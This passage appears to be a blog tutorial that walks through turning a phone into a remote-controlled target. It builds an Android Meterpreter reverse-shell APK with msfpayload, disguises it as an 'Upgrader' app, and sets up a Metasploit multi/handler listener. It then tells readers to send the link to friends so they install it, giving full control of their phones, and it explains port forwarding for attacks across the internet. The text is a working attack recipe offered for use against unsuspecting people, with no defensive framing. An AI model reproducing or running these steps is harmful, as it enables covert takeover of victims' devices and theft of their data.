msfpayloadandroid/meterpreter/reverse_tcpLHOST=192.168.0.4 R >/root/Upgrader.apk (replace LHOST with your own IP)
You can also hack android on WAN i.e. through Interet by using yourPublic/External IP in the LHOST and by port forwarding (ask me about port forwarding if you have problems in the comment section)
Step 2: Open Another Terminal:
Open another terminal until the file is being produced.
Load metasploit console, by typing : msfconsole
Step 3: Set-Up a Listener:
After it loads(it will take time), load the multi-handler exploit by typing :use exploit/multi/handler
Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp
To set L host type :set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external)
Step 4: Exploit!
At last type: exploit to start the listener.
Copy the application that you made (Upgrader.apk) from the root folder, to you android phone
Then send it using Uploading it to Dropbox or any sharing website
(like:. www.mediafire.com)
Then send the link that the Website gave you to your friends and exploit their phones (Only on LAN, but if you used the WAN method then you can use the exploit anywhere on the INTERNET)
Let the Victim install the Upgrader app(as he would think it is meant to upgrade some features on his phone)
However, the option of allowance for Installation of apps fromUnknown Sources should be enabled (if not) from the security settings of the android phone to allow the Trojan to install.
Keep coming for more!
Some post modules that work for windows might not work in android
For Eg: run killav, persistence (persistent backdoor) etc.
Thank You!
2nd way for android if first was confusing. read carefully all.
The Main Procedure:
When you are all set, carefully follow the below steps one by one.(all the code you need to enter will be shown in red color)
step1: Open the terminal in Linux , type the below code and press enter.
:~# msfpayload android/meterpreter/reverse_tcp LHOST=youripaddress LPORT=anyport(8080 or 4444) R > evil.apk
If you don't know your ip address, simply open another terminal and type "ifconfig" without quotes. You can see your ip address beside wlan0 it would be something like 192.168.x.x (Note: you need to do this only when you are connected to Internet).
Step2: Now the deploy application evil.apk will be automatically generated. You can find it in home folder.
Step3: Now open another terminal and type the below code.
> msfconsole
It takes sometime for metasploit to download and load its contents. So be patient!
Step4: When metasploit successfully loaded type the below code.
> use exploit/multi/handler
> set payload android/meterpreter/reverse_tcp
> set lhost 192.168.45.4 (the same ip address you entered in step1).
> set lport 8080 (the same port you used in step1).
> exploit
Now the console starts listening to 192.168.45.4 at port 8080.
Step5: Now all you need to do is, copy the evil.apk from home folder to the target device.
Step6: Install the evil.apk on the target device and when the device is connected to the internet open the app.
Step7: As soon as you open the app in the device, you can see the connected device in console terminal.
Step8: Now you have full access to the device from the terminal. Just type help and you will be given with all the available commands.
Congrats! you have successfully hacked an android device.
Post a Comment